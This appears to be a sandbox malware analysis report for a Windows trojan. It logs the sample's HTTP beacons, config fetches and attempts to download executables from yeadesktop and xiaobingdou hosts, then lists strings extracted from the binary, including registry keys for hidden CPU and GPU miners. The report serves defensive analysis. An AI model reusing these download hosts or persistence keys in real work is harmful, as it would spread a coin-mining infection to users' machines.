GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NUFDNTZFRUJDNEUyNTQzODNFODA2QjQ0RkMwRUE0RDE2RkM1N0Q0RjQzQ0FFQkZEN0YxRDM3QUVCMTIzMDkzODM1MUVGRjlEMEU1MTMwMzQ5OUZBMTFGQkQ1MDQ2NUU3QjQ1QjE3RTBFQjAxOTJBRkZDOEYzQ0IwQjZBRkQyQURB HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:28 GMT

Connection: close

Content-Length: 0

GET /upgrade/9001.xml HTTP/1.1

Accept: */*

User-Agent: Agent339723

Host: config.yeadesktop.com

Cache-Control: no-cache

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 200 OK

Content-Type: text/xml

Last-Modified: Thu, 27 Apr 2017 07:00:09 GMT

Accept-Ranges: bytes

ETag: "556fbfe823bfd21:0"

Server: Microsoft-IIS/7.5

Date: Wed, 16 Aug 2017 14:40:19 GMT

Content-Length: 173

#ws...................................................................
......................................................................
.................................HTTP/1.1 200 OK..Content-Type: text/x
ml..Last-Modified: Thu, 27 Apr 2017 07:00:09 GMT..Accept-Ranges: bytes
..ETag: "556fbfe823bfd21:0"..Server: Microsoft-IIS/7.5..Date: Wed, 16 
Aug 2017 14:40:19 GMT..Content-Length: 173..#ws.......................
......................................................................
......................................................................
.........

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:30 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525f2e1fc8b1c-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript" <<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:33 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUUwQzFENkMzMTFDQjM1MDZGNzI2OEE4NTM2RTFGN0Y2MzBDNjk4OTI0MjFCNUVFRTAxNkU1QzU1MTM1NkRBRTREODdFMUUyNjIwMUQ5RjNFMDFCQTkwQzgxQzVENkREODAxQ0U0RDVENThGOTJFNjVERjhGNzU2RjU1NzFEQkI5 HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:41 GMT

Connection: close

Content-Length: 0

GET /upgrade/popwndup.exe HTTP/1.0

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: down.yeadesktop.com

Accept: */*

Connection: Keep-Alive


HTTP/1.1 404 Not Found

Date: Wed, 16 Aug 2017 14:40:24 GMT

Content-Type: text/html

Connection: close

Set-Cookie: __cfduid=db21d6478c6c23c4f7c97c4e25eec4eb91502894424; expires=Thu, 16-Aug-18 14:40:24 GMT; path=/; domain=.yeadesktop.com; HttpOnly

Server: cloudflare-nginx

CF-RAY: 38f526080237842a-KBP
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, 
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
.  <h2>404 - ..................</h2>..  <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>....<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MzcxQUVFODQ0RUIxM0Q2NDA5QTQ3RDkzRTI4NjdFNDNBNjcyMDY1NDc2QTQ5NTA4ODJEMDFDOEI1MkIxNDk2OTc0MEMyMjVCQkIzRTk1RjU5MDI1NUVBMDRDNzJBQzA5RDM5NUZCNjk1NEU2QjY4NkJFOTQ1NDU2NEFCRjA0NkI= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:25 GMT

Connection: close

Content-Length: 0

GET /anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRURBOTFGNTNDNDFBMEVDRDk0ODkwODc3NUMxMTJCQjU5QUZGNzNCMTM4QkUxRUQ1Qjg0NDNCMjA4RjcwM0M1QUNFQTcxMzA0MTAzREQ4OTEzQUFCNzM0Njk2MEZGMTcxNUI= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:31 GMT

Connection: close

Content-Length: 0

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:30 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525eef6db83f4-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript" <<< skipped >>>

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:21 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:31 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525f532648b1c-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]..<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:39 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /upgrade/9001.xml HTTP/1.1

Accept: */*

User-Agent: Agent341033

Host: config.yeadesktop.com

Cache-Control: no-cache

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 200 OK

Content-Type: text/xml

Last-Modified: Thu, 27 Apr 2017 07:00:09 GMT

Accept-Ranges: bytes

ETag: "556fbfe823bfd21:0"

Server: Microsoft-IIS/7.5

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Length: 173

#ws...................................................................
......................................................................
.................................HTTP/1.1 200 OK..Content-Type: text/x
ml..Last-Modified: Thu, 27 Apr 2017 07:00:09 GMT..Accept-Ranges: bytes
..ETag: "556fbfe823bfd21:0"..Server: Microsoft-IIS/7.5..Date: Wed, 16 
Aug 2017 14:40:20 GMT..Content-Length: 173..#ws.......................
......................................................................
......................................................................
...........

GET /Histlst/popnew.xml HTTP/1.1

Host: config.yeadesktop.com

Cache-Control: no-cache

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 200 OK

Content-Type: text/xml

Last-Modified: Tue, 15 Aug 2017 05:31:25 GMT

Accept-Ranges: bytes

ETag: "3abf8fbc8715d31:0"

Server: Microsoft-IIS/7.5

Date: Wed, 16 Aug 2017 14:40:21 GMT

Content-Length: 10675

........................................................)hV(uI*[z%[x*~
m Nu)Kw)|})I.%[a.................)I.%[a)\B%[x%VX)hV(uI%KA*Z|)pu)Kv....
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:38 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:30 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525f166b7842a-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript" <<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:41 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3380:

.text

`.rdata

@.data

.gfids

@.tls

.rsrc

@.reloc

j.hPS8

9.uQAV

W9.tC

j.Yf;

_tcPVj@

.PjRW

inappropriate io control operation

not supported

operation canceled

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

address family not supported

broken pipe

function not supported

%b %d %H : %M : %S %Y

%m / %d / %y

%I : %M : %S %p

%H : %M : %S

%d / %m / %y

0123456789-

InitOnceExecuteOnce

g:\sdk\poco-1.7.8-all\foundation\src\File_WIN32U.cpp

!_path.empty()

g:\sdk\poco-1.7.8-all\foundation\src\FileStream_WIN32.cpp

src\TemporaryFile.cpp

%Y-%m-%dT%H:%M:%S%z

%Y-%m-%dT%H:%M:%s%z

%w, %e %b %y %H:%M:%S %Z

%w, %e %b %Y %H:%M:%S %Z

%w, %d %b %Y %H:%M:%S %Z

%W, %e-%b-%y %H:%M:%S %Z

%W, %e %b %y %H:%M:%S %Z

%w %b %f %H:%M:%S %Y

%Y-%m-%d %H:%M:%S

?#/:; @&=

%<>{}|\"^`!*'()$,[]

bad or invalid port number

src\TextConverter.cpp

src\ThreadPool.cpp

src\TextIterator.cpp

windows-1250

Windows-1250

windows-1251

Windows-1251

windows-1252

Windows-1252

cannot allocate thread context key

cannot join thread

src\ErrorHandler.cpp

Error reading HTTP request header

No HTTP request header

HTTP request method invalid or too long

HTTP request URI invalid or too long

Invalid HTTP version string

Unsupported Media Type

HTTP Version not supported

Error reading HTTP response header

No HTTP response header

Invalid HTTP status code

HTTP reason string too long

Unterminated HTTP response line

HTTP/1.0

Cannot set the port number for an already connected session

hXXp://

src\HTTPSession.cpp

0.0.0.0

Invalid address length passed to IPAddress()

Invalid address length passed to SocketAddress()

unsupported IP address family

src\Socket.cpp

()[]/|\',;

src\HTTPHeaderStream.cpp

src\HTTPStream.cpp

src\HTTPFixedLengthStream.cpp

src\HTTPChunkedStream.cpp

src\SocketImpl.cpp

Operation would block

Operation now in progress

Operation already in progress

Socket operation attempted on non-socket

Protocol not supported

Socket type not supported

Operation not supported

Protocol family not supported

Address family not supported

255.255.255.255

src\IPAddressImpl.cpp

mask() is only supported for IPv4 addresses

src\HostEntry.cpp

Not a valid registry key

RegDeleteKeyExW

Cannot open registry key:

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

Not a valid root key

Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag

hXXp://VVV.appinf.com/features/no-whitespace-in-element-content

hXXp://xml.org/sax/features/validation

hXXp://xml.org/sax/features/namespaces

hXXp://xml.org/sax/features/namespace-prefixes

hXXp://xml.org/sax/features/external-general-entities

hXXp://xml.org/sax/features/external-parameter-entities

hXXp://xml.org/sax/features/string-interning

hXXp://xml.org/sax/properties/declaration-handler

hXXp://xml.org/sax/properties/lexical-handler

hXXp://VVV.appinf.com/features/enable-partial-reads

xml=hXXp://VVV.w3.org/XML/1998/namespace

Data is specified for a node which does not support data

The implementation does not support the type of object requested

A parameter or an operation is not supported by the underlying object

hXXp://VVV.w3.org/XML/1998/namespace

hXXp://VVV.w3.org/xmlns/2000/

MaxPolicyElementKey

pExecutionResource

operator

operator ""

IND)ind)Visual C   CRT: Not enough memory to complete call to strerror.

Operation not permitted

Inappropriate I/O control operation

Broken pipe

?#%X.y

%S#[k

src\RegularExpression.cpp

offset <= subject.length()

src\MemoryPool.cpp

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

Error text not found (please report)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI

_http_version

.rmvb

.html

.jpeg

.divx

.mpeg

.moov

.opus

.webm

video/webm

file '%s' size is:(%d bytes)

HTTP/1.1

avhttp/2.9.9

https

Async open url '

G:\Code\vendor\inc\boost_1_61_0\boost/exception/detail/exception_ptr.hpp

Unsupported scheme '

', need call receive_header for continue receive the http header.

Http header:

Location url invalid, error message: '

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gpuminer

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\gplyra

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gplyra

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer

_unlink: %s

Removing %s.

%s[%d]:%s

..\..\Src\Download\HttpDownload.cpp

FINISHED --%s--

Downloaded: %s bytes in %d files

No URLs found in %s.

Download quota (%s bytes) EXCEEDED!

%swget.ini

%s: WGETRC points to %s, which doesn't exist.

%s: Cannot read %s (%s).

%s: Error in %s at line %d.

%s: %s: Invalid boolean `%s', use `on' or `off'.

%s: Invalid --execute command `%s'

%s: %s: Invalid number `%s'.

%s: %s: Invalid boolean `%s', use always, on, off, or never.

%s: %s: Invalid byte value `%s'

%s: %s: Invalid header `%s'.

%s: %s: Invalid time period `%s'

PTF://

hXXp://%s

PTF://%s

Unsupported scheme

Bad port number

IPv6 addresses not supported

%s: %s

d\

index.html

*password*

%s: %s: Not enough memory.

d:d:d

utime(%s): %s

d-d-d d:d:d

